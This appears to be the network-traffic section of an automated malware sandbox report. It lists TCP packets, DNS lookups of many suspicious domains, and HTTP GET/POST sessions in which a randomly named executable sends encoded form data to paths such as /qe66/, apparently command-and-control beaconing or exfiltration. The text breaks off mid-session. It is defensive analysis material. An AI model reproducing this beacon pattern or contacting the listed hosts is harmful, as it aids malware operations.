                                          Jul 4, 2024 16:54:12.055496931 CEST804972423.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:12.055634022 CEST4972480192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:12.061387062 CEST4972480192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:12.069638968 CEST804972423.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:13.559658051 CEST4972480192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:13.612584114 CEST804972423.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:14.578212023 CEST4972580192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:14.583165884 CEST804972523.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:14.585510969 CEST4972580192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:14.588407993 CEST4972580192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:14.593305111 CEST804972523.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:16.090781927 CEST4972580192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:16.136610031 CEST804972523.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:17.112859011 CEST4972680192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:17.118185043 CEST804972623.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:17.118263006 CEST4972680192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:17.121809959 CEST4972680192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:17.126888990 CEST804972623.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:17.128057003 CEST804972623.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:18.637639999 CEST4972680192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:18.688657999 CEST804972623.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:19.657409906 CEST4972780192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:19.662358999 CEST804972723.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:19.667346954 CEST4972780192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:19.667346954 CEST4972780192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:19.672120094 CEST804972723.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:33.457432032 CEST804972423.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:33.457488060 CEST4972480192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:35.977018118 CEST804972523.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:35.981558084 CEST4972580192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:38.477833986 CEST804972623.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:38.477932930 CEST4972680192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:41.260768890 CEST804972723.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:41.260879040 CEST4972780192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:41.261785030 CEST4972780192.168.2.723.251.54.212
                                          Jul 4, 2024 16:54:41.266556978 CEST804972723.251.54.212192.168.2.7
                                          Jul 4, 2024 16:54:46.305454969 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:46.310244083 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.310355902 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:46.311846018 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:46.316603899 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.924302101 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.924325943 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.924335003 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.924370050 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:46.924423933 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.924436092 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.924459934 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:46.924547911 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.924587965 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:46.924598932 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.924608946 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.924618959 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.924657106 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:46.924734116 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.924771070 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:46.929291010 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.929364920 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.929377079 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.929413080 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:46.929486990 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:46.929524899 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:47.014365911 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:47.014384031 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:47.014424086 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:47.014523029 CEST8049728199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:47.014563084 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:47.827960014 CEST4972880192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:48.844795942 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:48.849965096 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:48.850044966 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:48.852255106 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:48.857043028 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.483876944 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.483983994 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.483998060 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.484040022 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:49.484078884 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.484092951 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.484103918 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.484116077 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.484117031 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:49.484122992 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.484142065 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:49.484165907 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:49.484318972 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.484354019 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.484399080 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:49.488981962 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.489037991 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.489048004 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.489111900 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:49.489183903 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.489232063 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:49.577954054 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.577999115 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.578011990 CEST8049729199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:49.578047037 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:49.578083992 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:50.356796980 CEST4972980192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:51.418939114 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:51.423858881 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:51.423943043 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:51.426166058 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:51.431107044 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:51.431135893 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.051856041 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.051881075 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.051893950 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.051975012 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:52.051987886 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.052002907 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.052015066 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.052026987 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.052040100 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.052041054 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:52.052053928 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.052103043 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:52.052103043 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:52.052370071 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.052510023 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:52.057169914 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.057233095 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.057245016 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.057307005 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.057313919 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:52.057357073 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:52.145328045 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.145410061 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.145422935 CEST8049730199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:52.145510912 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:52.934694052 CEST4973080192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:53.959249973 CEST4973180192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:53.966015100 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:53.966521978 CEST4973180192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:53.975816965 CEST4973180192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:53.982036114 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.582721949 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.582777023 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.582789898 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.582945108 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.582957029 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.582967997 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.582973957 CEST4973180192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:54.583002090 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.583014965 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.583026886 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.583029985 CEST4973180192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:54.583074093 CEST4973180192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:54.583153009 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.583280087 CEST4973180192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:54.588082075 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.588131905 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.588144064 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.588301897 CEST4973180192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:54.588433981 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.588531017 CEST4973180192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:54.672668934 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.672689915 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.672738075 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:54.672853947 CEST4973180192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:54.676493883 CEST4973180192.168.2.7199.192.19.19
                                          Jul 4, 2024 16:54:54.681242943 CEST8049731199.192.19.19192.168.2.7
                                          Jul 4, 2024 16:54:59.771852970 CEST4973280192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:54:59.776686907 CEST8049732213.145.228.16192.168.2.7
                                          Jul 4, 2024 16:54:59.777580023 CEST4973280192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:54:59.779588938 CEST4973280192.168.2.7213.145.228.16
                                          Jul 4, 2024 16:54:59.784466028 CEST8049732213.145.228.16192.168.2.7
                                           Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                           Jul 4, 2024 16:52:36.241081953 CEST | 192.168.2.7 | 1.1.1.1 | 0x32eb | Standard query (0) | www.hprlz.cz | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:52:52.203234911 CEST | 192.168.2.7 | 1.1.1.1 | 0x3ccf | Standard query (0) | www.catherineviskadi.com | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:53:05.556727886 CEST | 192.168.2.7 | 1.1.1.1 | 0xf0d0 | Standard query (0) | www.hatercoin.online | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:53:13.663983107 CEST | 192.168.2.7 | 1.1.1.1 | 0x37e4 | Standard query (0) | www.fourgrouw.cfd | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:53:21.751537085 CEST | 192.168.2.7 | 1.1.1.1 | 0x1731 | Standard query (0) | www.bfiworkerscomp.com | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:53:35.664335966 CEST | 192.168.2.7 | 1.1.1.1 | 0xa43b | Standard query (0) | www.tinmapco.com | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:53:43.767363071 CEST | 192.168.2.7 | 1.1.1.1 | 0x795c | Standard query (0) | www.xn--fhq1c541j0zr.com | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:53:58.015775919 CEST | 192.168.2.7 | 1.1.1.1 | 0xad1d | Standard query (0) | www.xn--matfrmn-jxa4m.se | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:54:11.454082966 CEST | 192.168.2.7 | 1.1.1.1 | 0x1736 | Standard query (0) | www.anuts.top | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:54:46.266593933 CEST | 192.168.2.7 | 1.1.1.1 | 0x6294 | Standard query (0) | www.telwisey.info | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:54:59.688368082 CEST | 192.168.2.7 | 1.1.1.1 | 0x4fc2 | Standard query (0) | www.sandranoll.com | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:55:13.167337894 CEST | 192.168.2.7 | 1.1.1.1 | 0x185c | Standard query (0) | www.gipsytroya.com | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:55:26.501554966 CEST | 192.168.2.7 | 1.1.1.1 | 0x5c85 | Standard query (0) | www.helpers-lion.online | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:55:39.993566990 CEST | 192.168.2.7 | 1.1.1.1 | 0xa5dc | Standard query (0) | www.dmtxwuatbz.cc | A (IP address) | IN (0x0001) | false
                                           Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                           Jul 4, 2024 16:52:36.456454992 CEST | 1.1.1.1 | 192.168.2.7 | 0x32eb | No error (0) | www.hprlz.cz | | 5.44.111.162 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:52:52.242819071 CEST | 1.1.1.1 | 192.168.2.7 | 0x3ccf | No error (0) | www.catherineviskadi.com | | 217.160.0.106 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:53:05.566529989 CEST | 1.1.1.1 | 192.168.2.7 | 0xf0d0 | Name error (3) | www.hatercoin.online | none | none | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:53:13.680458069 CEST | 1.1.1.1 | 192.168.2.7 | 0x37e4 | Name error (3) | www.fourgrouw.cfd | none | none | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:53:22.011007071 CEST | 1.1.1.1 | 192.168.2.7 | 0x1731 | No error (0) | www.bfiworkerscomp.com | | 208.91.197.27 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:53:35.700967073 CEST | 1.1.1.1 | 192.168.2.7 | 0xa43b | Name error (3) | www.tinmapco.com | none | none | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:53:44.351984978 CEST | 1.1.1.1 | 192.168.2.7 | 0x795c | No error (0) | www.xn--fhq1c541j0zr.com | | 43.252.167.188 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:53:58.134581089 CEST | 1.1.1.1 | 192.168.2.7 | 0xad1d | No error (0) | www.xn--matfrmn-jxa4m.se | | 194.9.94.85 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:53:58.134581089 CEST | 1.1.1.1 | 192.168.2.7 | 0xad1d | No error (0) | www.xn--matfrmn-jxa4m.se | | 194.9.94.86 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:54:12.048006058 CEST | 1.1.1.1 | 192.168.2.7 | 0x1736 | No error (0) | www.anuts.top | | 23.251.54.212 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:54:46.300498962 CEST | 1.1.1.1 | 192.168.2.7 | 0x6294 | No error (0) | www.telwisey.info | | 199.192.19.19 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:54:59.769205093 CEST | 1.1.1.1 | 192.168.2.7 | 0x4fc2 | No error (0) | www.sandranoll.com | | 213.145.228.16 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:55:13.222177029 CEST | 1.1.1.1 | 192.168.2.7 | 0x185c | No error (0) | www.gipsytroya.com | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001) | false
                                           Jul 4, 2024 16:55:13.222177029 CEST | 1.1.1.1 | 192.168.2.7 | 0x185c | No error (0) | parkingpage.namecheap.com | | 91.195.240.19 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:55:26.608942986 CEST | 1.1.1.1 | 192.168.2.7 | 0x5c85 | No error (0) | www.helpers-lion.online | | 194.58.112.174 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:55:40.008565903 CEST | 1.1.1.1 | 192.168.2.7 | 0xa5dc | No error (0) | www.dmtxwuatbz.cc | | 172.67.210.102 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:55:40.008565903 CEST | 1.1.1.1 | 192.168.2.7 | 0xa5dc | No error (0) | www.dmtxwuatbz.cc | | 104.21.45.56 | A (IP address) | IN (0x0001) | false
                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           0 | 192.168.2.7 | 49704 | 5.44.111.162 | 80 | 6404 | C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Jul 4, 2024 16:52:36.477865934 CEST | 522 | OUT | GET /w6qg/?fhW=BLvXr6e0EhyxeX&YbCL=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CazhdUSIVLCtkAjvELp631DJLKvEqqNibis4AF0Y/xQXWBRPCD91/FJrEz HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Host: www.hprlz.cz
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                           Jul 4, 2024 16:52:37.133348942 CEST | 777 | IN | HTTP/1.1 301 Moved Permanently
                                          Server: nginx
                                          Date: Thu, 04 Jul 2024 14:52:37 GMT
                                          Content-Type: text/html; charset=iso-8859-1
                                          Content-Length: 403
                                          Connection: close
                                          Location: https://www.hprlz.cz/w6qg/?fhW=BLvXr6e0EhyxeX&YbCL=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CazhdUSIVLCtkAjvELp631DJLKvEqqNibis4AF0Y/xQXWBRPCD91/FJrEz
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.hprlz.cz/w6qg/?fhW=BLvXr6e0EhyxeX&amp;YbCL=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CazhdUSIVLCtkAjvELp631DJLKvEqqNibis4AF0Y/xQXWBRPCD91/FJrEz">here</a>.</p></body></html>


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           1 | 192.168.2.7 | 49705 | 217.160.0.106 | 80 | 6404 | C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           Jul 4, 2024 16:52:52.254179955 CEST | 808 | OUT | POST /qe66/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.catherineviskadi.com
                                          Origin: http://www.catherineviskadi.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 217
                                          Referer: http://www.catherineviskadi.com/qe66/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Ascii: YbCL=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR7EsWCvPvJgUIHvbLRtX1VDLPGO12BECnGqf+vSeLmOeKH7xRxw==
                                          Jul 4, 2024 16:52:52.932354927 CEST | 580 | IN | HTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Date: Thu, 04 Jul 2024 14:52:52 GMT
                                          Server: Apache
                                          Content-Encoding: gzip


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          2 | 192.168.2.7 | 49706 | 217.160.0.106 | 80 | 6404 | C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jul 4, 2024 16:52:54.789097071 CEST | 828 | OUT | POST /qe66/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.catherineviskadi.com
                                          Origin: http://www.catherineviskadi.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 237
                                          Referer: http://www.catherineviskadi.com/qe66/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Ascii: YbCL=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4fZYL2MEoaLc5ovpZL81oVnOCNrxiD0amsO4T7NBEnrrQaDo7qFMudx7gJba1uPjv+mQYRolyOCrTz/ENDR2q1owgDKy+GuqmCVRHS8gTXy8yH75IvEFqKBiF0lKPDZATEzL5GpLPbZLSz0CMRAWifSErbmiwqq557gKpQVnBLkx9cviv2p8McxISImXeE=
                                          Jul 4, 2024 16:52:55.473630905 CEST | 580 | IN | HTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Date: Thu, 04 Jul 2024 14:52:55 GMT
                                          Server: Apache
                                          Content-Encoding: gzip


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          3 | 192.168.2.7 | 49707 | 217.160.0.106 | 80 | 6404 | C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jul 4, 2024 16:52:57.320303917 CEST | 1841 | OUT | POST /qe66/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.catherineviskadi.com
                                          Origin: http://www.catherineviskadi.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 1249
                                          Referer: http://www.catherineviskadi.com/qe66/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
